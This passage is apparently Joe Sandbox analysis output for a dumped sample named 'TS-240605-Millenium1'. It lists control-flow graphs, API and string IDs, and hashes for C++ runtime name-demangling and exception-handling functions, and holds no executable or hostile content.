                                                                                          control_flow_graph 837 7ffe1a45cdbc-7ffe1a45cdf2 838 7ffe1a45cdf5-7ffe1a45cdff 837->838 839 7ffe1a45ce05-7ffe1a45ce0c 838->839 840 7ffe1a45d1cc-7ffe1a45d1d6 838->840 843 7ffe1a45ce0e-7ffe1a45ce15 839->843 844 7ffe1a45ce1b-7ffe1a45ce1e 839->844 841 7ffe1a45d1ea-7ffe1a45d1ed 840->841 842 7ffe1a45d1d8-7ffe1a45d1db 840->842 849 7ffe1a45d1ef-7ffe1a45d1fc call 7ffe1a457940 841->849 850 7ffe1a45d1fe-7ffe1a45d250 call 7ffe1a4579b0 call 7ffe1a4579dc 841->850 845 7ffe1a45d253-7ffe1a45d272 842->845 848 7ffe1a45d1dd-7ffe1a45d1e8 842->848 843->844 843->845 846 7ffe1a45ce20-7ffe1a45ce62 call 7ffe1a457680 call 7ffe1a4579dc 844->846 847 7ffe1a45ce9b-7ffe1a45cea5 844->847 846->847 880 7ffe1a45ce64-7ffe1a45ce98 call 7ffe1a458c5c call 7ffe1a4579dc 846->880 852 7ffe1a45ceab-7ffe1a45cebc 847->852 853 7ffe1a45d199-7ffe1a45d1a7 call 7ffe1a45ed94 847->853 848->845 849->845 850->845 859 7ffe1a45cec2-7ffe1a45cec5 852->859 860 7ffe1a45d174-7ffe1a45d197 call 7ffe1a45ed94 852->860 869 7ffe1a45d1ab-7ffe1a45d1b1 call 7ffe1a4579dc 853->869 865 7ffe1a45d0fb-7ffe1a45d167 call 7ffe1a4575d0 call 7ffe1a457680 call 7ffe1a4579dc 859->865 866 7ffe1a45cecb-7ffe1a45cece 859->866 860->869 891 7ffe1a45d1c2-7ffe1a45d1c6 865->891 912 7ffe1a45d169-7ffe1a45d172 call 7ffe1a457bfc 865->912 872 7ffe1a45ced4-7ffe1a45ced7 866->872 873 7ffe1a45d049-7ffe1a45d050 866->873 884 7ffe1a45d1b6-7ffe1a45d1bf 869->884 872->865 875 7ffe1a45cedd-7ffe1a45cee0 872->875 876 7ffe1a45d052-7ffe1a45d056 873->876 877 7ffe1a45d0aa-7ffe1a45d0f6 call 7ffe1a45a638 call 7ffe1a458c5c call 7ffe1a4579dc call 7ffe1a457a08 873->877 881 7ffe1a45d004-7ffe1a45d044 call 7ffe1a45ed94 call 7ffe1a457a08 call 7ffe1a4579dc 875->881 882 7ffe1a45cee6-7ffe1a45cee9 875->882 876->877 883 7ffe1a45d058-7ffe1a45d098 call 7ffe1a45baac call 7ffe1a4579dc 876->883 877->869 880->847 881->884 888 7ffe1a45cf00-7ffe1a45cf13 882->888 889 7ffe1a45ceeb-7ffe1a45cefb call 7ffe1a45b864 882->889 883->891 919 7ffe1a45d09e-7ffe1a45d0a5 883->919 884->891 897 7ffe1a45cf18-7ffe1a45cf2d call 7ffe1a45ed94 888->897 889->869 891->838 891->840 917 7ffe1a45cf2f-7ffe1a45cf32 897->917 918 7ffe1a45cf89-7ffe1a45cf93 897->918 912->891 924 7ffe1a45cf34-7ffe1a45cf7b call 7ffe1a4579b0 call 7ffe1a4579dc 917->924 925 7ffe1a45cf7d-7ffe1a45cf87 917->925 923 7ffe1a45cf96-7ffe1a45cf9c 918->923 919->891 928 7ffe1a45cff4-7ffe1a45cfff 923->928 929 7ffe1a45cf9e-7ffe1a45cfa8 923->929 924->923 925->923 928->891 929->897 931 7ffe1a45cfae-7ffe1a45cfef call 7ffe1a458c5c call 7ffe1a4579dc call 7ffe1a457a08 929->931 931->919
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+$Replicator::operator[]
                                                                                          • String ID: `anonymous namespace'
                                                                                          • API String ID: 3863519203-3062148218
                                                                                          • Opcode ID: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
                                                                                          • Instruction ID: b0aecc6a5b2ee625eb65b6c04eb6cd1c2b65b4eb29808fc0c3c241776bc2e4aa
                                                                                          • Opcode Fuzzy Hash: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
                                                                                          • Instruction Fuzzy Hash: A2E16DB2B08F8299EB10EF26D8801BD77A0FB45B58F4081B6EA8D17B65DF38D565C700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1223 7ffe1a45dc24-7ffe1a45dc5f 1224 7ffe1a45dc61-7ffe1a45dc64 1223->1224 1225 7ffe1a45dc6b-7ffe1a45dc70 1223->1225 1224->1225 1226 7ffe1a45ddda-7ffe1a45dddd 1225->1226 1227 7ffe1a45dc76 1225->1227 1228 7ffe1a45dde3 1226->1228 1229 7ffe1a45dffb-7ffe1a45e000 1226->1229 1230 7ffe1a45de40-7ffe1a45de64 call 7ffe1a458c5c 1227->1230 1231 7ffe1a45dc7c-7ffe1a45dc7f 1227->1231 1233 7ffe1a45dfdd-7ffe1a45dfef call 7ffe1a45a920 1228->1233 1234 7ffe1a45dde9-7ffe1a45ddee 1228->1234 1235 7ffe1a45e002-7ffe1a45e005 1229->1235 1236 7ffe1a45e01b-7ffe1a45e01f 1229->1236 1251 7ffe1a45de70-7ffe1a45de89 call 7ffe1a45a638 call 7ffe1a457ae0 1230->1251 1252 7ffe1a45de66-7ffe1a45de69 1230->1252 1237 7ffe1a45dd73-7ffe1a45dd78 1231->1237 1238 7ffe1a45dc85 1231->1238 1233->1229 1234->1230 1241 7ffe1a45ddf0-7ffe1a45ddf3 1234->1241 1242 7ffe1a45e055-7ffe1a45e06c call 7ffe1a45d3b8 1235->1242 1243 7ffe1a45e007-7ffe1a45e00a 1235->1243 1246 7ffe1a45e023 1236->1246 1247 7ffe1a45dd7a-7ffe1a45dd7d 1237->1247 1248 7ffe1a45ddcd-7ffe1a45ddd5 call 7ffe1a45e814 1237->1248 1244 7ffe1a45dc8b-7ffe1a45dc8d 1238->1244 1245 7ffe1a45dd66-7ffe1a45dd6e call 7ffe1a45b8c8 1238->1245 1241->1230 1254 7ffe1a45ddf5-7ffe1a45ddf8 1241->1254 1283 7ffe1a45e06e-7ffe1a45e083 1242->1283 1284 7ffe1a45e086-7ffe1a45e0a2 atol 1242->1284 1255 7ffe1a45e04f-7ffe1a45e053 1243->1255 1256 7ffe1a45e00c-7ffe1a45e00f 1243->1256 1258 7ffe1a45dd53-7ffe1a45dd61 1244->1258 1259 7ffe1a45dc93-7ffe1a45dc96 1244->1259 1260 7ffe1a45e026-7ffe1a45e04e call 7ffe1a460910 1245->1260 1246->1260 1261 7ffe1a45dd7f-7ffe1a45dd82 1247->1261 1262 7ffe1a45ddc0-7ffe1a45ddc8 call 7ffe1a45c448 1247->1262 1248->1260 1277 7ffe1a45ded2-7ffe1a45ded5 1251->1277 1326 7ffe1a45de8b-7ffe1a45de8f 1251->1326 1252->1251 1265 7ffe1a45de6b-7ffe1a45de6e 1252->1265 1254->1230 1272 7ffe1a45ddfa-7ffe1a45ddfd 1254->1272 1255->1246 1256->1242 1267 7ffe1a45e011-7ffe1a45e014 1256->1267 1258->1260 1274 7ffe1a45dc9c-7ffe1a45dc9f 1259->1274 1275 7ffe1a45dd46-7ffe1a45dd4e call 7ffe1a45d3b8 1259->1275 1263 7ffe1a45dd84-7ffe1a45dd87 1261->1263 1264 7ffe1a45ddb1-7ffe1a45ddbb call 7ffe1a45b118 1261->1264 1262->1260 1263->1264 1276 7ffe1a45dd89-7ffe1a45dd8c 1263->1276 1264->1260 1265->1251 1265->1277 1267->1242 1280 7ffe1a45e016-7ffe1a45e019 1267->1280 1272->1230 1286 7ffe1a45ddff-7ffe1a45de02 1272->1286 1287 7ffe1a45dca1-7ffe1a45dca4 1274->1287 1288 7ffe1a45dcdb-7ffe1a45dcde 1274->1288 1275->1260 1291 7ffe1a45dda4-7ffe1a45ddac call 7ffe1a45900c 1276->1291 1292 7ffe1a45dd8e-7ffe1a45dd91 1276->1292 1297 7ffe1a45df55-7ffe1a45df6e call 7ffe1a45d3b8 call 7ffe1a457ae0 1277->1297 1298 7ffe1a45ded7-7ffe1a45deda 1277->1298 1280->1236 1280->1242 1283->1284 1302 7ffe1a45e0d3-7ffe1a45e101 call 7ffe1a45f3c8 call 7ffe1a45737c 1284->1302 1303 7ffe1a45e0a4-7ffe1a45e0ae 1284->1303 1300 7ffe1a45de04-7ffe1a45de07 1286->1300 1301 7ffe1a45de20-7ffe1a45de2d call 7ffe1a45e174 1286->1301 1289 7ffe1a45dcce-7ffe1a45dcd6 call 7ffe1a45e9a8 1287->1289 1290 7ffe1a45dca6-7ffe1a45dca9 1287->1290 1295 7ffe1a45dce0-7ffe1a45dd11 call 7ffe1a457680 1288->1295 1296 7ffe1a45dd16-7ffe1a45dd41 call 7ffe1a458c5c call 7ffe1a45a638 call 7ffe1a4579dc 1288->1296 1289->1260 1304 7ffe1a45dcc1-7ffe1a45dcc9 call 7ffe1a45d678 1290->1304 1305 7ffe1a45dcab-7ffe1a45dcae 1290->1305 1291->1260 1292->1236 1307 7ffe1a45dd97-7ffe1a45dd9f call 7ffe1a45a638 1292->1307 1295->1260 1296->1260 1331 7ffe1a45dfb7-7ffe1a45dfc7 call 7ffe1a45d3b8 call 7ffe1a457ae0 1297->1331 1364 7ffe1a45df70-7ffe1a45df74 1297->1364 1315 7ffe1a45def3-7ffe1a45df0c call 7ffe1a45d3b8 call 7ffe1a457ae0 1298->1315 1316 7ffe1a45dedc-7ffe1a45dedf 1298->1316 1300->1236 1317 7ffe1a45de0d-7ffe1a45de14 1300->1317 1301->1236 1346 7ffe1a45de33-7ffe1a45de3b call 7ffe1a45dc24 1301->1346 1361 7ffe1a45e103-7ffe1a45e106 1302->1361 1362 7ffe1a45e16a-7ffe1a45e171 1302->1362 1303->1302 1318 7ffe1a45e0b0-7ffe1a45e0be 1303->1318 1304->1260 1305->1236 1320 7ffe1a45dcb4-7ffe1a45dcbc call 7ffe1a458cac 1305->1320 1307->1260 1315->1297 1370 7ffe1a45df0e-7ffe1a45df12 1315->1370 1330 7ffe1a45dee5-7ffe1a45dee8 1316->1330 1316->1331 1317->1301 1318->1302 1356 7ffe1a45e0c0-7ffe1a45e0ce call 7ffe1a45737c 1318->1356 1320->1260 1338 7ffe1a45de91-7ffe1a45dea4 call 7ffe1a458c5c 1326->1338 1339 7ffe1a45dea6-7ffe1a45deb8 call 7ffe1a45b95c 1326->1339 1330->1297 1342 7ffe1a45deea-7ffe1a45deed 1330->1342 1354 7ffe1a45dfcc-7ffe1a45dfdb call 7ffe1a457a08 1331->1354 1338->1277 1376 7ffe1a45dec3 1339->1376 1377 7ffe1a45deba-7ffe1a45dec1 1339->1377 1342->1315 1342->1354 1346->1260 1354->1260 1356->1260 1361->1362 1372 7ffe1a45e108-7ffe1a45e10b 1361->1372 1375 7ffe1a45e161-7ffe1a45e168 1362->1375 1373 7ffe1a45df8b-7ffe1a45df9d call 7ffe1a45b95c 1364->1373 1374 7ffe1a45df76-7ffe1a45df89 call 7ffe1a458c5c 1364->1374 1379 7ffe1a45df14-7ffe1a45df27 call 7ffe1a458c5c 1370->1379 1380 7ffe1a45df29-7ffe1a45df3b call 7ffe1a45b95c 1370->1380 1381 7ffe1a45e15a 1372->1381 1382 7ffe1a45e10d-7ffe1a45e110 1372->1382 1397 7ffe1a45df9f-7ffe1a45dfa6 1373->1397 1398 7ffe1a45dfa8 1373->1398 1374->1331 1383 7ffe1a45e124-7ffe1a45e151 call 7ffe1a457680 call 7ffe1a4579dc 1375->1383 1385 7ffe1a45dec6-7ffe1a45decd call 7ffe1a457430 1376->1385 1377->1385 1379->1297 1399 7ffe1a45df3d-7ffe1a45df44 1380->1399 1400 7ffe1a45df46 1380->1400 1381->1375 1382->1236 1389 7ffe1a45e116-7ffe1a45e11d 1382->1389 1383->1381 1385->1277 1389->1383 1402 7ffe1a45dfab-7ffe1a45dfb2 call 7ffe1a457430 1397->1402 1398->1402 1403 7ffe1a45df49-7ffe1a45df50 call 7ffe1a457430 1399->1403 1400->1403 1402->1331 1403->1297
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                          • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                          • API String ID: 2331677841-2441609178
                                                                                          • Opcode ID: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
                                                                                          • Instruction ID: 93562e20a7cb230eb50f8f01d2e8e48d429b6c114f72410326a843cfe3031cc9
                                                                                          • Opcode Fuzzy Hash: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
                                                                                          • Instruction Fuzzy Hash: 3FF1AEE2F08E1284FB25FB66D5551BC27A1AF45F64F4040F7CA4E16AB6DF3CA5698300

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1407 7ffe1a45b280-7ffe1a45b2b6 1408 7ffe1a45b2db-7ffe1a45b2e1 1407->1408 1409 7ffe1a45b2b8-7ffe1a45b2d6 call 7ffe1a4579dc 1407->1409 1411 7ffe1a45b2e3-7ffe1a45b2e6 1408->1411 1412 7ffe1a45b2ec-7ffe1a45b2ff 1408->1412 1419 7ffe1a45b790-7ffe1a45b7b3 1409->1419 1411->1412 1414 7ffe1a45b785-7ffe1a45b789 1411->1414 1415 7ffe1a45b323-7ffe1a45b326 1412->1415 1416 7ffe1a45b301-7ffe1a45b304 1412->1416 1420 7ffe1a45b78d 1414->1420 1415->1414 1418 7ffe1a45b32c-7ffe1a45b32f 1415->1418 1416->1409 1417 7ffe1a45b306-7ffe1a45b31c 1416->1417 1417->1418 1421 7ffe1a45b31e-7ffe1a45b321 1417->1421 1418->1414 1422 7ffe1a45b335-7ffe1a45b351 1418->1422 1420->1419 1421->1418 1423 7ffe1a45b357-7ffe1a45b361 1422->1423 1424 7ffe1a45b4a6-7ffe1a45b4b0 1422->1424 1427 7ffe1a45b435-7ffe1a45b438 1423->1427 1428 7ffe1a45b367-7ffe1a45b3b7 call 7ffe1a457680 call 7ffe1a4579dc 1423->1428 1425 7ffe1a45b577 1424->1425 1426 7ffe1a45b4b6-7ffe1a45b4c6 1424->1426 1432 7ffe1a45b57a-7ffe1a45b58a 1425->1432 1429 7ffe1a45b555-7ffe1a45b55f call 7ffe1a4593c0 1426->1429 1430 7ffe1a45b4cc-7ffe1a45b512 call 7ffe1a4593c0 call 7ffe1a458c5c call 7ffe1a4579dc * 2 1426->1430 1433 7ffe1a45b43f-7ffe1a45b443 1427->1433 1458 7ffe1a45b405-7ffe1a45b425 call 7ffe1a4579dc 1428->1458 1459 7ffe1a45b3b9-7ffe1a45b403 call 7ffe1a45cdbc call 7ffe1a458c5c call 7ffe1a4579dc * 2 1428->1459 1429->1432 1448 7ffe1a45b561-7ffe1a45b565 1429->1448 1467 7ffe1a45b574 1430->1467 1437 7ffe1a45b5b0-7ffe1a45b5b9 call 7ffe1a459abc 1432->1437 1438 7ffe1a45b58c-7ffe1a45b5ae call 7ffe1a459abc call 7ffe1a4579dc 1432->1438 1439 7ffe1a45b540-7ffe1a45b54c 1433->1439 1440 7ffe1a45b449-7ffe1a45b44b 1433->1440 1454 7ffe1a45b5d1-7ffe1a45b5d4 1437->1454 1455 7ffe1a45b5bb-7ffe1a45b5bf 1437->1455 1438->1454 1439->1429 1440->1414 1445 7ffe1a45b451-7ffe1a45b479 1440->1445 1452 7ffe1a45b514-7ffe1a45b531 call 7ffe1a459bdc 1445->1452 1453 7ffe1a45b47f-7ffe1a45b4a0 call 7ffe1a459bdc 1445->1453 1448->1432 1456 7ffe1a45b567-7ffe1a45b570 1448->1456 1452->1424 1478 7ffe1a45b537-7ffe1a45b53b 1452->1478 1479 7ffe1a45b4a3 1453->1479 1464 7ffe1a45b617-7ffe1a45b62e call 7ffe1a45b95c 1454->1464 1465 7ffe1a45b5d6-7ffe1a45b614 call 7ffe1a458c5c call 7ffe1a4579dc call 7ffe1a457a08 1454->1465 1455->1454 1463 7ffe1a45b5c1-7ffe1a45b5ce 1455->1463 1456->1467 1481 7ffe1a45b429-7ffe1a45b433 1458->1481 1459->1481 1463->1454 1487 7ffe1a45b630-7ffe1a45b637 1464->1487 1488 7ffe1a45b639 1464->1488 1465->1464 1467->1425 1478->1479 1479->1424 1481->1433 1490 7ffe1a45b63c-7ffe1a45b6a0 call 7ffe1a45cd88 call 7ffe1a458ec0 call 7ffe1a458c5c call 7ffe1a4579dc call 7ffe1a457a08 call 7ffe1a457ae0 1487->1490 1488->1490 1510 7ffe1a45b6a2-7ffe1a45b6a5 1490->1510 1511 7ffe1a45b6ba-7ffe1a45b6c6 1490->1511 1510->1511 1514 7ffe1a45b6a7-7ffe1a45b6b4 call 7ffe1a457ae0 1510->1514 1512 7ffe1a45b6db-7ffe1a45b6e4 call 7ffe1a45cbac 1511->1512 1513 7ffe1a45b6c8-7ffe1a45b6d9 call 7ffe1a45cbac call 7ffe1a457ae0 1511->1513 1522 7ffe1a45b6ff-7ffe1a45b725 call 7ffe1a45b9ec call 7ffe1a457ae0 1512->1522 1523 7ffe1a45b6e6-7ffe1a45b6ea 1512->1523 1513->1522 1514->1511 1530 7ffe1a45b727-7ffe1a45b733 call 7ffe1a45e2e0 call 7ffe1a457ae0 1522->1530 1531 7ffe1a45b759-7ffe1a45b762 call 7ffe1a45e2e0 1522->1531 1523->1522 1525 7ffe1a45b6ec-7ffe1a45b6fc 1523->1525 1525->1522 1538 7ffe1a45b738-7ffe1a45b73c 1530->1538 1537 7ffe1a45b764-7ffe1a45b768 1531->1537 1531->1538 1537->1538 1540 7ffe1a45b76a-7ffe1a45b779 1537->1540 1539 7ffe1a45b73f-7ffe1a45b742 1538->1539 1541 7ffe1a45b744-7ffe1a45b757 1539->1541 1542 7ffe1a45b77b-7ffe1a45b783 1539->1542 1540->1539 1541->1419 1542->1420
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID:
                                                                                          • API String ID: 2943138195-0
                                                                                          • Opcode ID: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
                                                                                          • Instruction ID: 2e7bae8358ff074180c73b1976c0d414eba33ed367bfbf5dccadc2b75fdc8e4b
                                                                                          • Opcode Fuzzy Hash: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
                                                                                          • Instruction Fuzzy Hash: 62F1AEB6B08A829EF711EF66D4501FC37B0EB04B5CB4044B3EA4D57AA9EE38D566C740

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1543 7ffe1a453334-7ffe1a45339b call 7ffe1a455768 1546 7ffe1a4533a1-7ffe1a4533a4 1543->1546 1547 7ffe1a4537ad-7ffe1a4537b3 abort 1543->1547 1546->1547 1548 7ffe1a4533aa-7ffe1a4533b0 1546->1548 1549 7ffe1a4537b4-7ffe1a4537d3 call 7ffe1a460910 1547->1549 1550 7ffe1a453481-7ffe1a453493 1548->1550 1551 7ffe1a4533b6-7ffe1a4533ba 1548->1551 1553 7ffe1a453768-7ffe1a45376c 1550->1553 1554 7ffe1a453499-7ffe1a45349d 1550->1554 1551->1550 1555 7ffe1a4533c0-7ffe1a4533cb 1551->1555 1557 7ffe1a45376e-7ffe1a453775 1553->1557 1558 7ffe1a4537a1-7ffe1a4537ab call 7ffe1a456e48 1553->1558 1554->1553 1559 7ffe1a4534a3-7ffe1a4534ae 1554->1559 1555->1550 1560 7ffe1a4533d1-7ffe1a4533d6 1555->1560 1557->1547 1561 7ffe1a453777-7ffe1a45379c call 7ffe1a453cf0 1557->1561 1558->1547 1558->1549 1559->1553 1563 7ffe1a4534b4-7ffe1a4534bb 1559->1563 1560->1550 1564 7ffe1a4533dc-7ffe1a4533e6 call 7ffe1a456e48 1560->1564 1561->1558 1568 7ffe1a45367f-7ffe1a45368b 1563->1568 1569 7ffe1a4534c1-7ffe1a4534fc call 7ffe1a45fc88 1563->1569 1564->1549 1574 7ffe1a4533ec-7ffe1a453417 call 7ffe1a456e48 * 2 call 7ffe1a4603e4 1564->1574 1568->1558 1572 7ffe1a453691-7ffe1a453695 1568->1572 1569->1568 1577 7ffe1a453502-7ffe1a45350b 1569->1577 1575 7ffe1a4536a5-7ffe1a4536ad 1572->1575 1576 7ffe1a453697-7ffe1a4536a3 call 7ffe1a4603a4 1572->1576 1608 7ffe1a453437-7ffe1a453441 call 7ffe1a456e48 1574->1608 1609 7ffe1a453419-7ffe1a45341d 1574->1609 1575->1558 1580 7ffe1a4536b3-7ffe1a4536c0 call 7ffe1a45fac8 1575->1580 1576->1575 1589 7ffe1a4536c6-7ffe1a4536ce 1576->1589 1582 7ffe1a453510-7ffe1a453542 1577->1582 1580->1558 1580->1589 1586 7ffe1a45366e-7ffe1a453675 1582->1586 1587 7ffe1a453548-7ffe1a453554 1582->1587 1586->1582 1594 7ffe1a45367b 1586->1594 1587->1586 1592 7ffe1a45355a-7ffe1a453573 1587->1592 1590 7ffe1a4536ee-7ffe1a4536f2 1589->1590 1591 7ffe1a4536d0-7ffe1a4536ed call 7ffe1a456e48 * 2 terminate 1589->1591 1599 7ffe1a4536f4-7ffe1a453703 call 7ffe1a4603a4 1590->1599 1600 7ffe1a453705 1590->1600 1591->1590 1596 7ffe1a45366b 1592->1596 1597 7ffe1a453579-7ffe1a4535be call 7ffe1a4603b8 * 2 1592->1597 1594->1568 1596->1586 1622 7ffe1a4535c0-7ffe1a4535e6 call 7ffe1a4603b8 call 7ffe1a454258 1597->1622 1623 7ffe1a4535fc-7ffe1a453602 1597->1623 1605 7ffe1a453708-7ffe1a453712 call 7ffe1a455800 1599->1605 1600->1605 1605->1558 1617 7ffe1a453718-7ffe1a453766 call 7ffe1a45fb94 call 7ffe1a45ff28 1605->1617 1608->1550 1624 7ffe1a453443-7ffe1a453463 call 7ffe1a456e48 * 2 call 7ffe1a455800 1608->1624 1609->1608 1614 7ffe1a45341f-7ffe1a45342a 1609->1614 1614->1608 1619 7ffe1a45342c-7ffe1a453431 1614->1619 1617->1558 1619->1547 1619->1608 1638 7ffe1a45360d-7ffe1a453661 call 7ffe1a45318c 1622->1638 1639 7ffe1a4535e8-7ffe1a4535fa 1622->1639 1627 7ffe1a453604-7ffe1a453608 1623->1627 1628 7ffe1a453666 1623->1628 1643 7ffe1a453465-7ffe1a45346f call 7ffe1a4558f0 1624->1643 1644 7ffe1a45347c 1624->1644 1627->1597 1628->1596 1638->1628 1639->1622 1639->1623 1647 7ffe1a4537d4-7ffe1a4537f7 call 7ffe1a452960 call 7ffe1a454b90 call 7ffe1a456b10 1643->1647 1648 7ffe1a453475-7ffe1a45347b terminate 1643->1648 1644->1550 1648->1644
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 4223619315-393685449
                                                                                          • Opcode ID: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
                                                                                          • Instruction ID: e48452420167fd4016481dcbd2d7482d51d7b7028674ea83e554c8d18ca61680
                                                                                          • Opcode Fuzzy Hash: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
                                                                                          • Instruction Fuzzy Hash: FFD1B3B2B08B4186EB60AF66D4502BD77A0FB45FA8F1041B6EE4D57B65DF38E1A0C700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1655 7ffe1a45ed94-7ffe1a45edd8 1656 7ffe1a45edda-7ffe1a45edf3 call 7ffe1a457970 1655->1656 1657 7ffe1a45edf8-7ffe1a45edfc 1655->1657 1667 7ffe1a45f042-7ffe1a45f068 call 7ffe1a460910 1656->1667 1658 7ffe1a45edfe-7ffe1a45ee22 call 7ffe1a45d974 1657->1658 1659 7ffe1a45ee50-7ffe1a45ee60 1657->1659 1668 7ffe1a45ee33-7ffe1a45ee4b call 7ffe1a457940 1658->1668 1669 7ffe1a45ee24-7ffe1a45ee2e 1658->1669 1662 7ffe1a45ee64-7ffe1a45ee68 1659->1662 1665 7ffe1a45ee6a-7ffe1a45ee6c 1662->1665 1666 7ffe1a45ee79-7ffe1a45ee81 1662->1666 1665->1666 1670 7ffe1a45ee6e-7ffe1a45ee77 1665->1670 1671 7ffe1a45ee83-7ffe1a45ee95 1666->1671 1672 7ffe1a45ee97-7ffe1a45eea1 1666->1672 1674 7ffe1a45effc-7ffe1a45efff 1668->1674 1669->1674 1670->1662 1670->1666 1676 7ffe1a45eedc-7ffe1a45ef03 call 7ffe1a45d3b8 1671->1676 1677 7ffe1a45eea7-7ffe1a45eeab 1672->1677 1680 7ffe1a45f001-7ffe1a45f00b 1674->1680 1681 7ffe1a45f03b-7ffe1a45f03e 1674->1681 1690 7ffe1a45efa5-7ffe1a45efc6 call 7ffe1a457680 call 7ffe1a4579dc 1676->1690 1691 7ffe1a45ef09-7ffe1a45ef13 1676->1691 1683 7ffe1a45eead-7ffe1a45eeaf 1677->1683 1684 7ffe1a45eebc-7ffe1a45eec4 1677->1684 1680->1681 1689 7ffe1a45f00d-7ffe1a45f010 1680->1689 1681->1667 1683->1684 1685 7ffe1a45eeb1-7ffe1a45eeba 1683->1685 1686 7ffe1a45eeca-7ffe1a45eed8 1684->1686 1687 7ffe1a45efc8-7ffe1a45efcb 1684->1687 1685->1677 1685->1684 1686->1676 1693 7ffe1a45efe3-7ffe1a45eff1 call 7ffe1a4575d0 1687->1693 1694 7ffe1a45efcd-7ffe1a45efd1 1687->1694 1689->1681 1692 7ffe1a45f012-7ffe1a45f026 call 7ffe1a45b95c 1689->1692 1712 7ffe1a45ef97-7ffe1a45efa3 call 7ffe1a457a08 1690->1712 1691->1690 1697 7ffe1a45ef19-7ffe1a45ef27 1691->1697 1692->1681 1705 7ffe1a45f028-7ffe1a45f036 1692->1705 1700 7ffe1a45eff6-7ffe1a45eff9 1693->1700 1694->1693 1695 7ffe1a45efd3-7ffe1a45efe1 1694->1695 1695->1674 1701 7ffe1a45ef29-7ffe1a45ef41 1697->1701 1702 7ffe1a45ef48-7ffe1a45ef60 atol 1697->1702 1700->1674 1701->1702 1710 7ffe1a45ef62-7ffe1a45ef71 call 7ffe1a45737c 1702->1710 1711 7ffe1a45ef76-7ffe1a45ef93 call 7ffe1a457680 call 7ffe1a4579dc 1702->1711 1705->1681 1710->1700 